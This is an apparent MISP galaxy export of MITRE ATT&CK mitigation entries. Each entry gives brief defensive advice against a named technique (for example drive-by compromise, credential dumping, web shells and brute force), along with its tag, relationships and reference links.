https://attack.mitre.org/mitigations/T1188

Drive-by Compromise Mitigation - T1189

Drive-by compromise relies on there being a vulnerable piece of software on the client end systems. Use modern browsers with security features turned on. Ensuring all browsers and plugins are kept updated can help prevent the exploit phase of this technique.

For malicious code served up through ads, adblockers can help prevent that code from executing in the first place. Script blocking extensions can help prevent the execution of JavaScript that may commonly be used during the exploitation process.

Browser sandboxes can be used to mitigate some of the impact of exploitation, but sandbox escapes may still exist. (Citation: Windows Blogs Microsoft Edge Sandbox) (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Other types of virtualization and application microsegmentation may also mitigate the impact of client-side exploitation. The risks of additional exploits and weaknesses in implementation may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)

Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility.

The tag is: misp-galaxy:mitre-course-of-action="Drive-by Compromise Mitigation - T1189"

Drive-by Compromise Mitigation - T1189 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

Table 6564. Table References

Links

https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/

https://attack.mitre.org/mitigations/T1189

https://blogs.technet.microsoft.com/srd/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/

https://blogs.windows.com/msedgedev/2017/03/23/strengthening-microsoft-edge-sandbox/

https://en.wikipedia.org/wiki/Control-flow_integrity

Data Obfuscation Mitigation - T1001

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Data Obfuscation Mitigation - T1001"

Data Obfuscation Mitigation - T1001 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Data Obfuscation - T1001" with estimative-language:likelihood-probability="almost-certain"

Table 6565. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1001

Web Shell Mitigation - T1100

Ensure that externally facing Web servers are patched regularly to prevent adversary access through [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) to gain remote code access or through file inclusion weaknesses that may allow adversaries to upload files or scripts that are automatically served as Web pages.

Audit account and group permissions to ensure that accounts used to manage servers do not overlap with accounts and permissions of users in the internal network that could be acquired through Credential Access and used to log into the Web server and plant a Web shell or pivot from the Web server into the internal network. (Citation: US-CERT Alert TA15-314A Web Shells)

The tag is: misp-galaxy:mitre-course-of-action="Web Shell Mitigation - T1100"

Web Shell Mitigation - T1100 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Web Shell - T1100" with estimative-language:likelihood-probability="almost-certain"

Table 6566. Table References

Links

https://attack.mitre.org/mitigations/T1100

https://www.us-cert.gov/ncas/alerts/TA15-314A

Automated Exfiltration Mitigation - T1020

Identify unnecessary system utilities, scripts, or potentially malicious software that may be used to transfer data outside of a network, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Automated Exfiltration Mitigation - T1020"

Automated Exfiltration Mitigation - T1020 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"

Table 6567. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1020

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Hardware Additions Mitigation - T1200

Establish network access control policies, such as using device certificates and the 802.1x standard. (Citation: Wikipedia 802.1x) Restrict use of DHCP to registered devices to prevent unregistered devices from communicating with trusted systems.

Block unknown devices and accessories by endpoint security configuration and monitoring agent.

The tag is: misp-galaxy:mitre-course-of-action="Hardware Additions Mitigation - T1200"

Hardware Additions Mitigation - T1200 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Hardware Additions - T1200" with estimative-language:likelihood-probability="almost-certain"

Table 6568. Table References

Links

https://attack.mitre.org/mitigations/T1200

https://en.wikipedia.org/wiki/IEEE_802.1X

Data Compressed Mitigation - T1002

Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to compress files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

If network intrusion prevention or data loss prevention tools are set to block specific file types from leaving the network over unencrypted channels, then an adversary may move to an encrypted channel.

The tag is: misp-galaxy:mitre-course-of-action="Data Compressed Mitigation - T1002"

Data Compressed Mitigation - T1002 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Data Compressed - T1002" with estimative-language:likelihood-probability="almost-certain"

Table 6569. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1002

https://technet.microsoft.com/en-us/library/ee791851.aspx

Credential Dumping Mitigation - T1003

Windows

Monitor/harden access to LSASS and SAM table with tools that allow process whitelisting. Limit credential overlap across systems to prevent lateral movement opportunities using [Valid Accounts](https://attack.mitre.org/techniques/T1078) if passwords and hashes are obtained. Ensure that local administrator accounts have complex, unique passwords across all systems on the network. Do not put user or admin domain accounts in the local administrator groups across systems unless they are tightly controlled, as this is often equivalent to having a local administrator account with the same password on all systems. Follow best practices for design and administration of an enterprise network to limit privileged account use across administrative tiers. (Citation: Microsoft Securing Privileged Access)

On Windows 8.1 and Windows Server 2012 R2, enable Protected Process Light for LSA. (Citation: Microsoft LSA)

Identify and block potentially malicious software that may be used to dump credentials by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

With Windows 10, Microsoft implemented new protections called Credential Guard to protect the LSA secrets that can be used to obtain credentials through forms of credential dumping. It is not configured by default and has hardware and firmware system requirements. (Citation: TechNet Credential Guard) It also does not protect against all forms of credential dumping. (Citation: GitHub SHB Credential Guard)

Manage the access control list for “Replicating Directory Changes” and other permissions associated with domain controller replication. (Citation: AdSecurity DCSync Sept 2015) (Citation: Microsoft Replication ACL)

Consider disabling or restricting NTLM traffic. (Citation: Microsoft Disable NTLM Nov 2012)

Linux

Scraping passwords from memory requires root privileges. Follow best practices for restricting access to escalated privileges to prevent hostile programs from accessing such sensitive regions of memory.

The tag is: misp-galaxy:mitre-course-of-action="Credential Dumping Mitigation - T1003"

Credential Dumping Mitigation - T1003 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="OS Credential Dumping - T1003" with estimative-language:likelihood-probability="almost-certain"

Table 6570. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://adsecurity.org/?p=1729

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1003

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://docs.microsoft.com/en-us/windows-server/identity/securing-privileged-access/securing-privileged-access-reference-material#a-nameesaebmaesae-administrative-forest-design-approach

https://github.com/iadgov/Secure-Host-Baseline/tree/master/Credential%20Guard

https://support.microsoft.com/help/303972/how-to-grant-the-replicating-directory-changes-permission-for-the-micr

https://technet.microsoft.com/en-us/itpro/windows/keep-secure/credential-guard

https://technet.microsoft.com/en-us/library/dn408187.aspx

https://technet.microsoft.com/en-us/library/ee791851.aspx

https://technet.microsoft.com/library/jj865668.aspx

System Partition Integrity - M1004

Ensure that Android devices being used include and enable the Verified Boot capability, which cryptographically ensures the integrity of the system partition.

The tag is: misp-galaxy:mitre-course-of-action="System Partition Integrity - M1004"

System Partition Integrity - M1004 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Modify System Partition - T1400" with estimative-language:likelihood-probability="almost-certain"

Table 6571. Table References

Links

https://attack.mitre.org/mitigations/M1004

Network Sniffing Mitigation - T1040

Ensure that all wireless traffic is encrypted appropriately. Use Kerberos, SSL, and multifactor authentication wherever possible. Monitor switches and network for span port usage, ARP/DNS poisoning, and router reconfiguration.

Identify and block potentially malicious software that may be used to sniff or analyze network traffic by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Network Sniffing Mitigation - T1040"

Network Sniffing Mitigation - T1040 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"

Table 6572. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1040

https://technet.microsoft.com/en-us/library/ee791851.aspx

New Service Mitigation - T1050

Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new services.

Identify and block unnecessary system utilities or potentially malicious software that may be used to create services by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="New Service Mitigation - T1050"

New Service Mitigation - T1050 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="New Service - T1050" with estimative-language:likelihood-probability="almost-certain"

Table 6573. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1050

https://technet.microsoft.com/en-us/library/ee791851.aspx

Fallback Channels Mitigation - T1008

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Fallback Channels Mitigation - T1008"

Fallback Channels Mitigation - T1008 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Fallback Channels - T1008" with estimative-language:likelihood-probability="almost-certain"

Table 6574. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1008

Binary Padding Mitigation - T1009

Identify potentially malicious software that may be executed from a padded or otherwise obfuscated binary, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Binary Padding Mitigation - T1009"

Binary Padding Mitigation - T1009 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Binary Padding - T1009" with estimative-language:likelihood-probability="almost-certain"

Table 6575. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1009

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Encrypt Network Traffic - M1009

Application developers should encrypt all of their application network traffic using the Transport Layer Security (TLS) protocol to ensure protection of sensitive data and deter network-based attacks. If desired, application developers could perform message-based encryption of data before passing it for TLS encryption.

iOS’s App Transport Security feature can be used to help ensure that all application network traffic is appropriately protected. Apple intends to mandate use of App Transport Security (Citation: TechCrunch-ATS) for all apps in the Apple App Store unless appropriate justification is given.

Android’s Network Security Configuration feature similarly can be used by app developers to help ensure that all of their application network traffic is appropriately protected (Citation: Android-NetworkSecurityConfig).

Use of Virtual Private Network (VPN) tunnels, e.g. using the IPsec protocol, can help mitigate some types of network attacks as well.

The tag is: misp-galaxy:mitre-course-of-action="Encrypt Network Traffic - M1009"

Encrypt Network Traffic - M1009 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Eavesdrop on Insecure Network Communication - T1439" with estimative-language:likelihood-probability="almost-certain"

  • mitigates: misp-galaxy:mitre-attack-pattern="Rogue Cellular Base Station - T1467" with estimative-language:likelihood-probability="almost-certain"

Table 6576. Table References

Links

https://attack.mitre.org/mitigations/M1009

https://developer.android.com/training/articles/security-config.html

https://techcrunch.com/2016/06/14/apple-will-require-https-connections-for-ios-apps-by-the-end-of-2016/

Brute Force Mitigation - T1110

Set account lockout policies after a certain number of failed login attempts to prevent passwords from being guessed. Too strict a policy can create a denial of service condition and render environments unusable, with all accounts being locked out permanently. Use multifactor authentication. Follow best practices for mitigating access to [Valid Accounts](https://attack.mitre.org/techniques/T1078).

Refer to NIST guidelines when creating passwords. (Citation: NIST 800-63-3)

Where possible, also enable multifactor authentication on external-facing services.

The tag is: misp-galaxy:mitre-course-of-action="Brute Force Mitigation - T1110"

Brute Force Mitigation - T1110 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Brute Force - T1110" with estimative-language:likelihood-probability="almost-certain"

Table 6577. Table References

Links

https://attack.mitre.org/mitigations/T1110

https://pages.nist.gov/800-63-3/sp800-63b.html

Query Registry Mitigation - T1012

Identify unnecessary system utilities or potentially malicious software that may be used to acquire information within the Registry, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Query Registry Mitigation - T1012"

Query Registry Mitigation - T1012 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

Table 6578. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1012

https://technet.microsoft.com/en-us/library/ee791851.aspx

Web Service Mitigation - T1102

Firewalls and Web proxies can be used to enforce external network communication policy. It may be difficult for an organization to block particular services because so many of them are commonly used during the course of business.

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific protocol or encoded commands used by a particular adversary or tool, and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Web Service Mitigation - T1102"

Web Service Mitigation - T1102 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"

Table 6579. Table References

Links

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1102

Application Developer Guidance - M1013

This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.

The tag is: misp-galaxy:mitre-course-of-action="Application Developer Guidance - M1013"

Application Developer Guidance - M1013 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Access Sensitive Data in Device Logs - T1413" with estimative-language:likelihood-probability="almost-certain"

Table 6580. Table References

Links

https://attack.mitre.org/mitigations/M1013

AppInit DLLs Mitigation - T1103

Upgrade to Windows 8 or later and enable secure boot.

Identify and block potentially malicious software that may be executed through AppInit DLLs by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.

The tag is: misp-galaxy:mitre-course-of-action="AppInit DLLs Mitigation - T1103"

AppInit DLLs Mitigation - T1103 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="AppInit DLLs - T1103" with estimative-language:likelihood-probability="almost-certain"

Table 6581. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1103

Network Intrusion Prevention - M1031

Use intrusion detection signatures to block traffic at network boundaries.

The tag is: misp-galaxy:mitre-course-of-action="Network Intrusion Prevention - M1031"

Table 6582. Table References

Links

https://attack.mitre.org/mitigations/M1031

Port Monitors Mitigation - T1013

Identify and block potentially malicious software that may persist in this manner by using whitelisting (Citation: Beechey 2010) tools capable of monitoring DLL loads by processes running under SYSTEM permissions.

The tag is: misp-galaxy:mitre-course-of-action="Port Monitors Mitigation - T1013"

Port Monitors Mitigation - T1013 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Port Monitors - T1013" with estimative-language:likelihood-probability="almost-certain"

Table 6583. Table References

Links

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://attack.mitre.org/mitigations/T1013

Encrypt Sensitive Information - M1041

Protect sensitive information with strong encryption.

The tag is: misp-galaxy:mitre-course-of-action="Encrypt Sensitive Information - M1041"

Table 6584. Table References

Links

https://attack.mitre.org/mitigations/M1041

Active Directory Configuration - M1015

Configure Active Directory to prevent use of certain techniques; use SID Filtering, etc.

The tag is: misp-galaxy:mitre-course-of-action="Active Directory Configuration - M1015"

Table 6585. Table References

Links

https://attack.mitre.org/mitigations/M1015

Accessibility Features Mitigation - T1015

To use this technique remotely, an adversary must use it in conjunction with RDP. Ensure that Network Level Authentication is enabled to force the remote desktop session to authenticate before the session is created and the login screen displayed. It is enabled by default on Windows Vista and later. (Citation: TechNet RDP NLA)

If possible, use a Remote Desktop Gateway to manage connections and security configuration of RDP within a network. (Citation: TechNet RDP Gateway)

Identify and block potentially malicious software that may be executed by an adversary with this technique by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Accessibility Features Mitigation - T1015"

Accessibility Features Mitigation - T1015 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Accessibility Features - T1015" with estimative-language:likelihood-probability="almost-certain"

Table 6586. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1015

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/cc731150.aspx

https://technet.microsoft.com/en-us/library/cc732713.aspx

https://technet.microsoft.com/en-us/library/ee791851.aspx

Plist Modification Mitigation - T1150

Prevent plist files from being modified by users by making them read-only.

The tag is: misp-galaxy:mitre-course-of-action="Plist Modification Mitigation - T1150"

Plist Modification Mitigation - T1150 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Plist Modification - T1150" with estimative-language:likelihood-probability="almost-certain"

Table 6587. Table References

Links

https://attack.mitre.org/mitigations/T1150

Systemd Service Mitigation - T1501

The creation and modification of systemd service unit files is generally reserved for administrators such as the Linux root user and other users with superuser privileges. Limit user access to system utilities such as systemctl to only users who have a legitimate need. Restrict read/write access to systemd unit files to only select privileged users who have a legitimate need to manage system services. Additionally, the installation of software commonly adds and changes systemd service unit files. Restrict software installation to trusted repositories only and be cautious of orphaned software packages. Utilize malicious code protection and application whitelisting to mitigate the ability of malware to create or modify systemd services.

The tag is: misp-galaxy:mitre-course-of-action="Systemd Service Mitigation - T1501"

Table 6588. Table References

Links

https://attack.mitre.org/mitigations/T1501

Shared Webroot Mitigation - T1051

Networks that allow for open development and testing of Web content and allow users to set up their own Web servers on the enterprise network may be particularly vulnerable if the systems and Web servers are not properly secured to limit privileged account use, unauthenticated network share access, and network/system isolation.

Ensure proper permissions on directories that are accessible through a Web server. Disallow remote access to the webroot or other directories used to serve Web content. Disable execution on directories within the webroot. Ensure that the permissions of the Web server process are only what is required by not using built-in accounts; instead, create specific accounts to limit unnecessary access or permissions overlap across multiple systems. (Citation: acunetix Server Security) (Citation: NIST Server Security July 2008)

The tag is: misp-galaxy:mitre-course-of-action="Shared Webroot Mitigation - T1051"

Shared Webroot Mitigation - T1051 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Shared Webroot - T1051" with estimative-language:likelihood-probability="almost-certain"

Table 6589. Table References

Links

https://attack.mitre.org/mitigations/T1051

https://nvlpubs.nist.gov/nistpubs/legacy/sp/nistspecialpublication800-123.pdf

https://www.acunetix.com/websitesecurity/webserver-security/

Launch Daemon Mitigation - T1160

Limit privileges of user accounts and remediate Privilege Escalation vectors so only authorized administrators can create new Launch Daemons.

The tag is: misp-galaxy:mitre-course-of-action="Launch Daemon Mitigation - T1160"

Launch Daemon Mitigation - T1160 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Launch Daemon - T1160" with estimative-language:likelihood-probability="almost-certain"

Table 6590. Table References

Links

https://attack.mitre.org/mitigations/T1160

File Deletion Mitigation - T1107

Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to delete files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="File Deletion Mitigation - T1107"

File Deletion Mitigation - T1107 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="File Deletion - T1107" with estimative-language:likelihood-probability="almost-certain"

Table 6591. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1107

https://technet.microsoft.com/en-us/library/ee791851.aspx

User Account Management - M1018

Manage the creation, modification, use, and permissions associated with user accounts.

The tag is: misp-galaxy:mitre-course-of-action="User Account Management - M1018"

Table 6592. Table References

Links

https://attack.mitre.org/mitigations/M1018

Redundant Access Mitigation - T1108

Identify and block potentially malicious software that may be used as a remote access tool, and audit and/or block it by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and will be different across various malware families and versions. Adversaries will likely change tool signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: University of Birmingham C2)

The tag is: misp-galaxy:mitre-course-of-action="Redundant Access Mitigation - T1108"

Redundant Access Mitigation - T1108 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Redundant Access - T1108" with estimative-language:likelihood-probability="almost-certain"

Table 6593. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf

https://attack.mitre.org/mitigations/T1108

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Component Firmware Mitigation - T1109

Prevent adversary access to privileged accounts or access necessary to perform this technique.

Consider removing and replacing system components suspected of being compromised.

The tag is: misp-galaxy:mitre-course-of-action="Component Firmware Mitigation - T1109"

Table 6594. Table References

Links

https://attack.mitre.org/mitigations/T1109

System Firmware Mitigation - T1019

Prevent adversary access to privileged accounts or access necessary to perform this technique. Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Patch the BIOS and EFI as necessary. Use Trusted Platform Module technology. (Citation: TCG Trusted Platform Module)

The tag is: misp-galaxy:mitre-course-of-action="System Firmware Mitigation - T1019"

System Firmware Mitigation - T1019 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="System Firmware - T1019" with estimative-language:likelihood-probability="almost-certain"

Table 6595. Table References

Links

http://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_04292008.pdf

https://attack.mitre.org/mitigations/T1019

Threat Intelligence Program - M1019

A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.

The tag is: misp-galaxy:mitre-course-of-action="Threat Intelligence Program - M1019"

Table 6596. Table References

Links

https://attack.mitre.org/mitigations/M1019

Data Encrypted Mitigation - T1022

Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to encrypt files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Data Encrypted Mitigation - T1022"

Data Encrypted Mitigation - T1022 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Data Encrypted - T1022" with estimative-language:likelihood-probability="almost-certain"

Table 6597. Table References

Links

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1022

https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html

https://technet.microsoft.com/en-us/library/ee791851.aspx

Shortcut Modification Mitigation - T1023

Limit permissions for who can create symbolic links in Windows to appropriate groups such as Administrators and necessary groups for virtualization. This can be done through GPO: Computer Configuration > [Policies] > Windows Settings > Security Settings > Local Policies > User Rights Assignment: Create symbolic links. (Citation: UCF STIG Symbolic Links)

Identify and block unknown, potentially malicious software that may be executed through shortcut modification by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)

The tag is: misp-galaxy:mitre-course-of-action="Shortcut Modification Mitigation - T1023"

Shortcut Modification Mitigation - T1023 has relationships with:

  • mitigates: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1023" with estimative-language:likelihood-probability="almost-certain"

Table 6598. Table References

Links

http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html

http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx

http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599

https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm

https://attack.mitre.org/mitigations/T1023

https://technet.microsoft.com/en-us/library/ee791851.aspx

https://www.stigviewer.com/stig/windows_server_2008_r2_member_server/2015-06-25/finding/V-26482

User Execution Mitigation - T1204

